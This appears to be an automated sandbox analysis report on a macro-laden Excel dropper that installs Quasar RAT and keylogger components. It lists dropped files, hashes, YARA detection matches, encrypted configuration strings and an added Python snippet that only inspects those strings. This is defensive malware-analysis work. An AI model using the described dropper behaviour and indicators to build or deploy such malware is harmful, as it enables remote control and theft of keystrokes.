Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Roaming\sp.exe
Abnormal high CPU Usage
Source: C:\Users\user\AppData\Roaming\sp.exe Process Stats: CPU usage > 98%
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Source: C:\Users\user\AppData\Roaming\sp.exe Memory allocated: 76E20000 page execute and read and write
Source: C:\Users\user\AppData\Roaming\sp.exe Memory allocated: 76D20000 page execute and read and write
Source: C:\Users\user\AppData\Roaming\sp.exe Memory allocated: 76E20000 page execute and read and write
Source: C:\Users\user\AppData\Roaming\sp.exe Memory allocated: 76D20000 page execute and read and write
Source: C:\Users\user\AppData\Local\Temp\eyBLwzbrUF1mwXoy.exe Memory allocated: 76E20000 page execute and read and write
Source: C:\Users\user\AppData\Local\Temp\eyBLwzbrUF1mwXoy.exe Memory allocated: 76D20000 page execute and read and write
Source: C:\Users\user\AppData\Local\Temp\eyBLwzbrUF1mwXoy.exe Memory allocated: 76E20000 page execute and read and write
Source: C:\Users\user\AppData\Local\Temp\eyBLwzbrUF1mwXoy.exe Memory allocated: 76D20000 page execute and read and write
Source: C:\Users\user\AppData\Local\Temp\ars4t7gFPGrepVgh.exe Memory allocated: 76E20000 page execute and read and write
Source: C:\Users\user\AppData\Local\Temp\ars4t7gFPGrepVgh.exe Memory allocated: 76D20000 page execute and read and write
Contains functionality to call native functions
Source: C:\Users\user\AppData\Roaming\sp.exe Code function: 28_2_00478772 __EH_prolog,GetModuleHandleA,GetProcAddress,GetCurrentThread,NtSetInformationThread, 28_2_00478772
Contains functionality to communicate with device drivers
Source: C:\Users\user\AppData\Roaming\sp.exe Code function: 28_2_005C6B10: new,DeviceIoControl, 28_2_005C6B10
Detected potential crypto function
Source: C:\Users\user\AppData\Roaming\sp.exe Code function: 24_2_004E2A38 24_2_004E2A38
Source: C:\Users\user\AppData\Roaming\sp.exe Code function: 24_2_004E4CD8 24_2_004E4CD8
Source: C:\Users\user\AppData\Roaming\sp.exe Code function: 24_2_004E02D8 24_2_004E02D8
Source: C:\Users\user\AppData\Roaming\sp.exe Code function: 24_2_004E5AF0 24_2_004E5AF0
Source: C:\Users\user\AppData\Roaming\sp.exe Code function: 24_2_004E6350 24_2_004E6350
Source: C:\Users\user\AppData\Roaming\sp.exe Code function: 24_2_004E75F4 24_2_004E75F4
Source: C:\Users\user\AppData\Roaming\sp.exe Code function: 24_2_004E4CC8 24_2_004E4CC8
Source: C:\Users\user\AppData\Roaming\sp.exe Code function: 24_2_004E3540 24_2_004E3540
Source: C:\Users\user\AppData\Roaming\sp.exe Code function: 24_2_004E3500 24_2_004E3500
Source: C:\Users\user\AppData\Roaming\sp.exe Code function: 24_2_004E3530 24_2_004E3530
Source: C:\Users\user\AppData\Roaming\sp.exe Code function: 24_2_004E37DA 24_2_004E37DA
Source: C:\Users\user\AppData\Roaming\sp.exe Code function: 24_2_004E63D9 24_2_004E63D9
Source: C:\Users\user\AppData\Roaming\sp.exe Code function: 24_2_004E37E8 24_2_004E37E8
Source: C:\Users\user\AppData\Roaming\sp.exe Code function: 24_2_004E5BB0 24_2_004E5BB0
Source: C:\Users\user\AppData\Roaming\sp.exe Code function: 24_2_00983657 24_2_00983657
Source: C:\Users\user\AppData\Roaming\sp.exe Code function: 24_2_009809A1 24_2_009809A1
Source: C:\Users\user\AppData\Roaming\sp.exe Code function: 24_2_00980500 24_2_00980500
Source: C:\Users\user\AppData\Roaming\sp.exe Code function: 24_2_0098375C 24_2_0098375C
Source: C:\Users\user\AppData\Roaming\sp.exe Code function: 28_2_006940D0 28_2_006940D0
Source: C:\Users\user\AppData\Roaming\sp.exe Code function: 28_2_006849A0 28_2_006849A0
Source: C:\Users\user\AppData\Roaming\sp.exe Code function: 28_2_0040EA7D 28_2_0040EA7D
Source: C:\Users\user\AppData\Roaming\sp.exe Code function: 28_2_004F2AA7 28_2_004F2AA7
Source: C:\Users\user\AppData\Roaming\sp.exe Code function: 28_2_0042ABC1 28_2_0042ABC1
Source: C:\Users\user\AppData\Roaming\sp.exe Code function: 28_2_0068321E 28_2_0068321E
Source: C:\Users\user\AppData\Roaming\sp.exe Code function: 28_2_00411532 28_2_00411532
Source: C:\Users\user\AppData\Roaming\sp.exe Code function: 28_2_004276C4 28_2_004276C4
Source: C:\Users\user\AppData\Roaming\sp.exe Code function: 28_2_00689D67 28_2_00689D67
Source: C:\Users\user\AppData\Local\Temp\eyBLwzbrUF1mwXoy.exe Code function: 31_2_00481811 31_2_00481811
Source: C:\Users\user\AppData\Local\Temp\eyBLwzbrUF1mwXoy.exe Code function: 31_2_00483178 31_2_00483178
Source: C:\Users\user\AppData\Local\Temp\eyBLwzbrUF1mwXoy.exe Code function: 31_2_0048E138 31_2_0048E138
Source: C:\Users\user\AppData\Local\Temp\eyBLwzbrUF1mwXoy.exe Code function: 31_2_00482229 31_2_00482229
Source: C:\Users\user\AppData\Local\Temp\eyBLwzbrUF1mwXoy.exe Code function: 31_2_00488358 31_2_00488358
Source: C:\Users\user\AppData\Local\Temp\eyBLwzbrUF1mwXoy.exe Code function: 31_2_00480470 31_2_00480470
Source: C:\Users\user\AppData\Local\Temp\eyBLwzbrUF1mwXoy.exe Code function: 31_2_00480FC8 31_2_00480FC8
Source: C:\Users\user\AppData\Local\Temp\eyBLwzbrUF1mwXoy.exe Code function: 31_2_00484000 31_2_00484000
Source: C:\Users\user\AppData\Local\Temp\eyBLwzbrUF1mwXoy.exe Code function: 31_2_00485811 31_2_00485811
Source: C:\Users\user\AppData\Local\Temp\eyBLwzbrUF1mwXoy.exe Code function: 31_2_00485178 31_2_00485178
Source: C:\Users\user\AppData\Local\Temp\eyBLwzbrUF1mwXoy.exe Code function: 31_2_00485188 31_2_00485188
Source: C:\Users\user\AppData\Local\Temp\eyBLwzbrUF1mwXoy.exe Code function: 31_2_00485348 31_2_00485348
Source: C:\Users\user\AppData\Local\Temp\eyBLwzbrUF1mwXoy.exe Code function: 31_2_0048D308 31_2_0048D308
Source: C:\Users\user\AppData\Local\Temp\eyBLwzbrUF1mwXoy.exe Code function: 31_2_00485338 31_2_00485338
Source: C:\Users\user\AppData\Local\Temp\eyBLwzbrUF1mwXoy.exe Code function: 31_2_0048CBC0 31_2_0048CBC0
Source: C:\Users\user\AppData\Local\Temp\eyBLwzbrUF1mwXoy.exe Code function: 31_2_0048BCA0 31_2_0048BCA0
Source: C:\Users\user\AppData\Local\Temp\eyBLwzbrUF1mwXoy.exe Code function: 31_2_00484DB9 31_2_00484DB9
Source: C:\Users\user\AppData\Local\Temp\eyBLwzbrUF1mwXoy.exe Code function: 31_2_0048F748 31_2_0048F748
Source: C:\Users\user\AppData\Local\Temp\eyBLwzbrUF1mwXoy.exe Code function: 31_2_00483FF1 31_2_00483FF1
Source: C:\Users\user\AppData\Local\Temp\eyBLwzbrUF1mwXoy.exe Code function: 31_2_01F631E8 31_2_01F631E8
Source: C:\Users\user\AppData\Local\Temp\eyBLwzbrUF1mwXoy.exe Code function: 31_2_01F6B427 31_2_01F6B427
Source: C:\Users\user\AppData\Local\Temp\eyBLwzbrUF1mwXoy.exe Code function: 31_2_01F6474A 31_2_01F6474A
Source: C:\Users\user\AppData\Local\Temp\eyBLwzbrUF1mwXoy.exe Code function: 31_2_01F625B0 31_2_01F625B0
Source: C:\Users\user\AppData\Local\Temp\eyBLwzbrUF1mwXoy.exe Code function: 31_2_01F625A0 31_2_01F625A0
Source: C:\Users\user\AppData\Local\Temp\eyBLwzbrUF1mwXoy.exe Code function: 31_2_01F63D95 31_2_01F63D95
Source: C:\Users\user\AppData\Local\Temp\eyBLwzbrUF1mwXoy.exe Code function: 31_2_01F63180 31_2_01F63180
Source: C:\Users\user\AppData\Local\Temp\eyBLwzbrUF1mwXoy.exe Code function: 31_2_01F6B8B9 31_2_01F6B8B9
Source: C:\Users\user\AppData\Local\Temp\eyBLwzbrUF1mwXoy.exe Code function: 31_2_01F60012 31_2_01F60012
Source: C:\Users\user\AppData\Local\Temp\eyBLwzbrUF1mwXoy.exe Code function: 31_2_01F65AE0 31_2_01F65AE0
Source: C:\Users\user\AppData\Local\Temp\eyBLwzbrUF1mwXoy.exe Code function: 31_2_01F65AD0 31_2_01F65AD0
Source: C:\Users\user\AppData\Local\Temp\eyBLwzbrUF1mwXoy.exe Code function: 31_2_04142FFB 31_2_04142FFB
Source: C:\Users\user\AppData\Local\Temp\eyBLwzbrUF1mwXoy.exe Code function: 31_2_01F60048 31_2_01F60048
Source: C:\Users\user\AppData\Local\Temp\eyBLwzbrUF1mwXoy.exe Code function: 35_2_003144A0 35_2_003144A0
Source: C:\Users\user\AppData\Local\Temp\eyBLwzbrUF1mwXoy.exe Code function: 35_2_003137D0 35_2_003137D0
Source: C:\Users\user\AppData\Local\Temp\eyBLwzbrUF1mwXoy.exe Code function: 35_2_00313488 35_2_00313488
Source: C:\Users\user\AppData\Local\Temp\eyBLwzbrUF1mwXoy.exe Code function: 35_2_00741CD0 35_2_00741CD0
Source: C:\Users\user\AppData\Local\Temp\eyBLwzbrUF1mwXoy.exe Code function: 35_2_00743F5B 35_2_00743F5B
Source: C:\Users\user\AppData\Local\Temp\ars4t7gFPGrepVgh.exe Code function: 37_2_001A1810 37_2_001A1810
Source: C:\Users\user\AppData\Local\Temp\ars4t7gFPGrepVgh.exe Code function: 37_2_001AE138 37_2_001AE138
Source: C:\Users\user\AppData\Local\Temp\ars4t7gFPGrepVgh.exe Code function: 37_2_001A3178 37_2_001A3178
Source: C:\Users\user\AppData\Local\Temp\ars4t7gFPGrepVgh.exe Code function: 37_2_001A2229 37_2_001A2229
Source: C:\Users\user\AppData\Local\Temp\ars4t7gFPGrepVgh.exe Code function: 37_2_001A8358 37_2_001A8358
Source: C:\Users\user\AppData\Local\Temp\ars4t7gFPGrepVgh.exe Code function: 37_2_001A0470 37_2_001A0470
Source: C:\Users\user\AppData\Local\Temp\ars4t7gFPGrepVgh.exe Code function: 37_2_001A0FC8 37_2_001A0FC8
Source: C:\Users\user\AppData\Local\Temp\ars4t7gFPGrepVgh.exe Code function: 37_2_001A5811 37_2_001A5811
Source: C:\Users\user\AppData\Local\Temp\ars4t7gFPGrepVgh.exe Code function: 37_2_001A4000 37_2_001A4000
Source: C:\Users\user\AppData\Local\Temp\ars4t7gFPGrepVgh.exe Code function: 37_2_001A30EA 37_2_001A30EA
Source: C:\Users\user\AppData\Local\Temp\ars4t7gFPGrepVgh.exe Code function: 37_2_001A5178 37_2_001A5178
Source: C:\Users\user\AppData\Local\Temp\ars4t7gFPGrepVgh.exe Code function: 37_2_001A5188 37_2_001A5188
Source: C:\Users\user\AppData\Local\Temp\ars4t7gFPGrepVgh.exe Code function: 37_2_001AD308 37_2_001AD308
Source: C:\Users\user\AppData\Local\Temp\ars4t7gFPGrepVgh.exe Code function: 37_2_001A5338 37_2_001A5338
Source: C:\Users\user\AppData\Local\Temp\ars4t7gFPGrepVgh.exe Code function: 37_2_001A5348 37_2_001A5348
Source: C:\Users\user\AppData\Local\Temp\ars4t7gFPGrepVgh.exe Code function: 37_2_001A8349 37_2_001A8349
Source: C:\Users\user\AppData\Local\Temp\ars4t7gFPGrepVgh.exe Code function: 37_2_001ACBC0 37_2_001ACBC0
Source: C:\Users\user\AppData\Local\Temp\ars4t7gFPGrepVgh.exe Code function: 37_2_001ABCA0 37_2_001ABCA0
Source: C:\Users\user\AppData\Local\Temp\ars4t7gFPGrepVgh.exe Code function: 37_2_001A4DB8 37_2_001A4DB8
Source: C:\Users\user\AppData\Local\Temp\ars4t7gFPGrepVgh.exe Code function: 37_2_001A0F5D 37_2_001A0F5D
Source: C:\Users\user\AppData\Local\Temp\ars4t7gFPGrepVgh.exe Code function: 37_2_001AF748 37_2_001AF748
Source: C:\Users\user\AppData\Local\Temp\ars4t7gFPGrepVgh.exe Code function: 37_2_001A3FF1 37_2_001A3FF1
Source: C:\Users\user\AppData\Local\Temp\ars4t7gFPGrepVgh.exe Code function: 37_2_003E2090 37_2_003E2090
Source: C:\Users\user\AppData\Local\Temp\ars4t7gFPGrepVgh.exe Code function: 37_2_003E31E8 37_2_003E31E8
Source: C:\Users\user\AppData\Local\Temp\ars4t7gFPGrepVgh.exe Code function: 37_2_003E474A 37_2_003E474A
Source: C:\Users\user\AppData\Local\Temp\ars4t7gFPGrepVgh.exe Code function: 37_2_003EB3F9 37_2_003EB3F9
Source: C:\Users\user\AppData\Local\Temp\ars4t7gFPGrepVgh.exe Code function: 37_2_003EB427 37_2_003EB427
Source: C:\Users\user\AppData\Local\Temp\ars4t7gFPGrepVgh.exe Code function: 37_2_003E5C25 37_2_003E5C25
Source: C:\Users\user\AppData\Local\Temp\ars4t7gFPGrepVgh.exe Code function: 37_2_003E0012 37_2_003E0012
Source: C:\Users\user\AppData\Local\Temp\ars4t7gFPGrepVgh.exe Code function: 37_2_003EB8B9 37_2_003EB8B9
Source: C:\Users\user\AppData\Local\Temp\ars4t7gFPGrepVgh.exe Code function: 37_2_003E25B0 37_2_003E25B0
Source: C:\Users\user\AppData\Local\Temp\ars4t7gFPGrepVgh.exe Code function: 37_2_003E25A0 37_2_003E25A0
Source: C:\Users\user\AppData\Local\Temp\ars4t7gFPGrepVgh.exe Code function: 37_2_003E3180 37_2_003E3180
Source: C:\Users\user\AppData\Local\Temp\ars4t7gFPGrepVgh.exe Code function: 37_2_003E5AE0 37_2_003E5AE0
Source: C:\Users\user\AppData\Local\Temp\ars4t7gFPGrepVgh.exe Code function: 37_2_003E5AD0 37_2_003E5AD0
Source: C:\Users\user\AppData\Local\Temp\ars4t7gFPGrepVgh.exe Code function: 37_2_00AC2FFB 37_2_00AC2FFB
Source: C:\Users\user\AppData\Local\Temp\ars4t7gFPGrepVgh.exe Code function: 37_2_003E0048 37_2_003E0048
Document contains embedded VBA macros
Source: spetsifikatsiya.xls OLE indicator, VBA macros: true
Dropped file seen in connection with other malware
Source: Joe Sandbox View Dropped File: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\5DVxvgK9jn5gaBl[1].exe 91F92DAA8C73D6470E92F484CF8CFA68EB3D49AE01170E7A673273E6B854B6F8
Source: Joe Sandbox View Dropped File: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\5DVxvgK9jn5gaBl[1].exe 91F92DAA8C73D6470E92F484CF8CFA68EB3D49AE01170E7A673273E6B854B6F8
Source: Joe Sandbox View Dropped File: C:\Users\user\AppData\Local\Temp\ars4t7gFPGrepVgh.exe 91F92DAA8C73D6470E92F484CF8CFA68EB3D49AE01170E7A673273E6B854B6F8
Source: Joe Sandbox View Dropped File: C:\Users\user\AppData\Local\Temp\eyBLwzbrUF1mwXoy.exe 91F92DAA8C73D6470E92F484CF8CFA68EB3D49AE01170E7A673273E6B854B6F8
Source: Joe Sandbox View Dropped File: C:\Users\user\AppData\Roaming\JrekdQ.exe 91F92DAA8C73D6470E92F484CF8CFA68EB3D49AE01170E7A673273E6B854B6F8
Found potential string decryption / allocating functions
Source: C:\Users\user\AppData\Roaming\sp.exe Code function: String function: 006876A0 appears 87 times
Source: C:\Users\user\AppData\Roaming\sp.exe Code function: String function: 006811C5 appears 76 times
Source: C:\Users\user\AppData\Roaming\sp.exe Code function: String function: 006B08FC appears 807 times
Source: C:\Users\user\AppData\Roaming\sp.exe Code function: String function: 00411C35 appears 40 times
Source: C:\Users\user\AppData\Roaming\sp.exe Code function: String function: 00680E81 appears 125 times
Source: C:\Users\user\AppData\Roaming\sp.exe Code function: String function: 006850AE appears 35 times
Source: C:\Users\user\AppData\Roaming\sp.exe Code function: String function: 005CEF10 appears 135 times
Source: C:\Users\user\AppData\Roaming\sp.exe Code function: String function: 00411FB1 appears 172 times
Source: C:\Users\user\AppData\Roaming\sp.exe Code function: String function: 00696B06 appears 45 times
Tries to load missing DLLs
Source: C:\Users\user\AppData\Roaming\sp.exe Section loaded: ext-ms-win-kernel32-package-current-l1-1-0.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\sp.exe Section loaded: sfc_os.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\sp.exe Section loaded: sfc_os.dll Jump to behavior
Yara signature match
Source: spetsifikatsiya.xls, type: SAMPLE Matched rule: SUSP_Excel4Macro_AutoOpen date = 2020-03-26, author = John Lambert @JohnLaTwC, description = Detects Excel4 macro use with auto open / close, score = 2fb198f6ad33d0f26fb94a1aa159fef7296e0421da68887b8f2548bbd227e58f
Source: dump.pcap, type: PCAP Matched rule: SUSP_PowerShell_Caret_Obfuscation_2 date = 2019-07-20, author = Florian Roth, description = Detects powershell keyword obfuscated with carets, reference = Internal Research
Source: 00000011.00000002.2113764449.000000000384C000.00000004.00000001.sdmp, type: MEMORY Matched rule: SUSP_PowerShell_Caret_Obfuscation_2 date = 2019-07-20, author = Florian Roth, description = Detects powershell keyword obfuscated with carets, reference = Internal Research
Source: 00000023.00000002.2389281983.0000000000402000.00000040.00000001.sdmp, type: MEMORY Matched rule: Quasar_RAT_1 date = 2017-04-07, hash4 = f08db220df716de3d4f63f3007a03f902601b9b32099d6a882da87312f263f34, hash3 = 515c1a68995557035af11d818192f7866ef6a2018aa13112fefbe08395732e89, hash2 = 1ce40a89ef9d56fd32c00db729beecc17d54f4f7c27ff22f708a957cd3f9a4ec, hash1 = 0774d25e33ca2b1e2ee2fafe3fdbebecefbf1d4dd99e6460f0bc8713dd0fd740, author = Florian Roth, description = Detects Quasar RAT, reference = https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 00000025.00000002.2384182418.0000000003CC0000.00000004.00000001.sdmp, type: MEMORY Matched rule: Quasar_RAT_1 date = 2017-04-07, hash4 = f08db220df716de3d4f63f3007a03f902601b9b32099d6a882da87312f263f34, hash3 = 515c1a68995557035af11d818192f7866ef6a2018aa13112fefbe08395732e89, hash2 = 1ce40a89ef9d56fd32c00db729beecc17d54f4f7c27ff22f708a957cd3f9a4ec, hash1 = 0774d25e33ca2b1e2ee2fafe3fdbebecefbf1d4dd99e6460f0bc8713dd0fd740, author = Florian Roth, description = Detects Quasar RAT, reference = https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 0000001F.00000002.2282183645.0000000003C60000.00000004.00000001.sdmp, type: MEMORY Matched rule: Quasar_RAT_1 date = 2017-04-07, hash4 = f08db220df716de3d4f63f3007a03f902601b9b32099d6a882da87312f263f34, hash3 = 515c1a68995557035af11d818192f7866ef6a2018aa13112fefbe08395732e89, hash2 = 1ce40a89ef9d56fd32c00db729beecc17d54f4f7c27ff22f708a957cd3f9a4ec, hash1 = 0774d25e33ca2b1e2ee2fafe3fdbebecefbf1d4dd99e6460f0bc8713dd0fd740, author = Florian Roth, description = Detects Quasar RAT, reference = https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: C:\Users\user\Documents\pd.bat, type: DROPPED Matched rule: SUSP_PowerShell_Caret_Obfuscation_2 date = 2019-07-20, author = Florian Roth, description = Detects powershell keyword obfuscated with carets, reference = Internal Research
Source: 35.2.eyBLwzbrUF1mwXoy.exe.400000.1.unpack, type: UNPACKEDPE Matched rule: Vermin_Keylogger_Jan18_1 date = 2018-01-29, hash5 = 24956d8edcf2a1fd26805ec58cfd1ee7498e1a59af8cc2f4b832a7ab34948c18, hash4 = 4c5e019e0e55a3fe378aa339d52c235c06ecc5053625a5d54d65c4ae38c6e3da, hash3 = 0157b43eb3c20928b77f8700ad8eb279a0aa348921df074cd22ebaff01edaae6, hash2 = e1d917769267302d58a2fd00bc49d4aee5a472227a75f9366b46ce243e9cbef7, hash1 = 74ba162eef84bf13d1d79cb26192a4692c09fed57f321230ddb7668a88e3935d, author = Florian Roth, description = Detects Vermin Keylogger, hash6 = 2963c5eacaad13ace807edd634a4a5896cb5536f961f43afcf8c1f25c08a5eef, reference = https://researchcenter.paloaltonetworks.com/2018/01/unit42-vermin-quasar-rat-custom-malware-used-ukraine/, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 35.2.eyBLwzbrUF1mwXoy.exe.400000.1.unpack, type: UNPACKEDPE Matched rule: xRAT_1 date = 2017-12-11, hash2 = f1a45adcf907e660ec848c6086e28c9863b7b70d0d38417dd05a4261973c955a, hash1 = 92be93ec4cbe76182404af0b180871fbbfa3c7b34e4df6745dbcde480b8b4b3b, author = Florian Roth, description = Detects Patchwork malware, reference = https://goo.gl/Pg3P4W, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 35.2.eyBLwzbrUF1mwXoy.exe.400000.1.unpack, type: UNPACKEDPE Matched rule: Quasar_RAT_1 date = 2017-04-07, hash4 = f08db220df716de3d4f63f3007a03f902601b9b32099d6a882da87312f263f34, hash3 = 515c1a68995557035af11d818192f7866ef6a2018aa13112fefbe08395732e89, hash2 = 1ce40a89ef9d56fd32c00db729beecc17d54f4f7c27ff22f708a957cd3f9a4ec, hash1 = 0774d25e33ca2b1e2ee2fafe3fdbebecefbf1d4dd99e6460f0bc8713dd0fd740, author = Florian Roth, description = Detects Quasar RAT, reference = https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 35.2.eyBLwzbrUF1mwXoy.exe.400000.1.unpack, type: UNPACKEDPE Matched rule: Quasar_RAT_2 date = 2017-04-07, hash3 = f08db220df716de3d4f63f3007a03f902601b9b32099d6a882da87312f263f34, hash2 = 515c1a68995557035af11d818192f7866ef6a2018aa13112fefbe08395732e89, author = Florian Roth, description = Detects Quasar RAT, reference = https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf, license = https://creativecommons.org/licenses/by-nc/4.0/, super_rule = 0774d25e33ca2b1e2ee2fafe3fdbebecefbf1d4dd99e6460f0bc8713dd0fd740
Source: 35.2.eyBLwzbrUF1mwXoy.exe.400000.1.unpack, type: UNPACKEDPE Matched rule: MAL_QuasarRAT_May19_1 date = 2019-05-27, hash1 = 0644e561225ab696a97ba9a77583dcaab4c26ef0379078c65f9ade684406eded, author = Florian Roth, description = Detects QuasarRAT malware, reference = https://blog.ensilo.com/uncovering-new-activity-by-apt10
Source: 35.2.eyBLwzbrUF1mwXoy.exe.400000.1.unpack, type: UNPACKEDPE Matched rule: CN_disclosed_20180208_KeyLogger_1 date = 2018-02-08, hash1 = c492889e1d271a98e15264acbb21bfca9795466882520d55dc714c4899ed2fcf, author = Florian Roth, description = Detects malware from disclosed CN malware set, reference = https://www.virustotal.com/graph/#/selected/n120z79z208z189/drawer/graph-details, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 5DVxvgK9jn5gaBl[1].exe.28.dr Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: eyBLwzbrUF1mwXoy.exe.28.dr Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: 5DVxvgK9jn5gaBl[1].exe0.28.dr Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: JrekdQ.exe.31.dr Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: 35.2.eyBLwzbrUF1mwXoy.exe.400000.1.unpack, ???ue004?u1bf6u2a06u0d01????????????.cs Base64 encoded string: 'muWPA0ZMZOZC16alqlb7OLoKFF6AK/WGExjSh2sTLzY/HNKE8rw/LjwNO8jxwG5P8XmanhcHXUh/Znan/Qha9A==', 'kdZuJNg3s3qi60d8KAw+Ogu5e+94NKyEBSKgEBwFzCVWwu2kGt++qLwK8TBsq+lTBXxsNcIHpRZ1cGkVMYWvzTSaElwiShLbehLklNW4YYQ=', '+bLBtFqvA62b9vNvvPQyjmGK2WpZ+RJ9pUtoxTtsb8K6WfUawvz1gS5iut++GrF4DuuuMzkFiMCEyLF9AaegJA==', 'v2HDs4RSygEAZ6NJNCuYwi0ACuluvNLNbRFYPlxXUpO0FxzAGLWq3OXdsjP5+ukjo6yDLqnUGh7wyi7nDtq/CQ==', 'jqflyylK/niLKf+GtR+Lv/aWEa6QVqAQUCBDd050Ntb2fHHztlgQMTWdADeZZF3mFDd9u+0ou/K5Jphk6b3V7Q==', 'rle7N1m2WcaSri/+BJFoH9R3R4bb8EbkaU2TYWRdWojx+g1t9ncREIrAWOvoDmETZzEe0Mw/2wR+/BF8yljPoBTG+f/JAv1YhyEeXfJysig=', 'z4mS0TG28az/6Zq6H1EWK43Z0L6V2PnE7ouOqTwEvdoVRXfhtFMdqKebh3cw7r71i5/CG3g7acrI4B9cvpwiqaer8YOnmXcM7ZzRm/qc8r4=', 'g0diI4GsK+sU5dVZUm/Qgsee4D9atKNMOgUKjSgMfBv6DVapU0ZNn4j2bVXd9/eONJ0gi7LLAe4+P+1lOMyL5Q=='
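The eight Base64 strings above are the kind of values Quasar keeps in its embedded settings class. A quick structural check tells an analyst whether they are plaintext configuration (hosts, mutex names) or ciphertext that still needs the sample's key. The Python below is an added example, not part of the report or of the Quasar code base: it decodes each string and reports its length, whether it is printable, its byte entropy and whether the size fits a 32-byte HMAC-SHA256 tag + 16-byte IV + AES-CBC ciphertext padded to 16-byte blocks. That layout is my reading of Quasar's open-source Aes128 helper and is an assumption here, not something the report states; the constants MAC_LEN, IV_LEN and BLOCK encode it.

```python
import base64
import math
import string

# The eight settings strings listed in the report, copied verbatim.
SETTINGS_B64 = [
    "muWPA0ZMZOZC16alqlb7OLoKFF6AK/WGExjSh2sTLzY/HNKE8rw/LjwNO8jxwG5P8XmanhcHXUh/Znan/Qha9A==",
    "kdZuJNg3s3qi60d8KAw+Ogu5e+94NKyEBSKgEBwFzCVWwu2kGt++qLwK8TBsq+lTBXxsNcIHpRZ1cGkVMYWvzTSaElwiShLbehLklNW4YYQ=",
    "+bLBtFqvA62b9vNvvPQyjmGK2WpZ+RJ9pUtoxTtsb8K6WfUawvz1gS5iut++GrF4DuuuMzkFiMCEyLF9AaegJA==",
    "v2HDs4RSygEAZ6NJNCuYwi0ACuluvNLNbRFYPlxXUpO0FxzAGLWq3OXdsjP5+ukjo6yDLqnUGh7wyi7nDtq/CQ==",
    "jqflyylK/niLKf+GtR+Lv/aWEa6QVqAQUCBDd050Ntb2fHHztlgQMTWdADeZZF3mFDd9u+0ou/K5Jphk6b3V7Q==",
    "rle7N1m2WcaSri/+BJFoH9R3R4bb8EbkaU2TYWRdWojx+g1t9ncREIrAWOvoDmETZzEe0Mw/2wR+/BF8yljPoBTG+f/JAv1YhyEeXfJysig=",
    "z4mS0TG28az/6Zq6H1EWK43Z0L6V2PnE7ouOqTwEvdoVRXfhtFMdqKebh3cw7r71i5/CG3g7acrI4B9cvpwiqaer8YOnmXcM7ZzRm/qc8r4=",
    "g0diI4GsK+sU5dVZUm/Qgsee4D9atKNMOgUKjSgMfBv6DVapU0ZNn4j2bVXd9/eONJ0gi7LLAe4+P+1lOMyL5Q==",
]

# Assumed layout of an encrypted Quasar setting: HMAC-SHA256 tag, then the
# AES IV, then AES-CBC ciphertext padded to whole blocks (assumption, see text).
MAC_LEN = 32
IV_LEN = 16
BLOCK = 16

PRINTABLE = set(string.printable.encode())


def shannon_entropy(data):
    """Bits of entropy per byte; random/encrypted data sits near 8, text near 4-5."""
    if not data:
        return 0.0
    counts = {}
    for b in data:
        counts[b] = counts.get(b, 0) + 1
    n = len(data)
    return -sum(c / n * math.log2(c / n) for c in counts.values())


def inspect_blob(b64):
    """Decode one Base64 string and describe what the bytes look like."""
    raw = base64.b64decode(b64, validate=True)
    body = len(raw) - MAC_LEN - IV_LEN
    return {
        "length": len(raw),
        "printable": all(b in PRINTABLE for b in raw),
        "entropy": round(shannon_entropy(raw), 2),
        # True when there is room for tag + IV + at least one cipher block and
        # the remainder is block aligned, i.e. the size fits the assumed layout.
        "mac_iv_cbc_layout": body >= BLOCK and body % BLOCK == 0,
    }


def inspect_all(blobs=SETTINGS_B64):
    return [inspect_blob(b) for b in blobs]


if __name__ == "__main__":
    for b64, info in zip(SETTINGS_B64, inspect_all()):
        print(b64[:16] + "...", info)
```

Every string decodes to 64 or 80 bytes, which is 48 bytes of tag and IV plus one or two AES blocks, so nothing here is usable as an indicator without first recovering the key and decrypting; the C2 host and port in the Hosts section of the report are the better starting point.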
Source: classification engine Classification label: mal100.troj.spyw.expl.evad.winXLS@57/27@7/5
Source: C:\Users\user\AppData\Roaming\sp.exe Code function: 24_2_00960AB2 AdjustTokenPrivileges, 24_2_00960AB2
Source: C:\Users\user\AppData\Roaming\sp.exe Code function: 24_2_00960A7B AdjustTokenPrivileges, 24_2_00960A7B
Source: C:\Users\user\AppData\Roaming\sp.exe Code function: 28_2_0045624F __EH_prolog,CreateToolhelp32Snapshot,Process32FirstW,OpenProcess,TerminateProcess,CloseHandle,Process32NextW,CloseHandle, 28_2_0045624F
Source: C:\Users\user\AppData\Roaming\sp.exe Code function: 28_2_0042A2F9 __EH_prolog,CoInitialize,CoCreateInstance,CoUninitialize, 28_2_0042A2F9
Source: C:\Users\user\AppData\Roaming\sp.exe Code function: 28_2_004231B3 __CxxThrowException@8,GetLastError,LoadResource,LockResource,SizeofResource, 28_2_004231B3
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\Desktop\CCDE0000 Jump to behavior
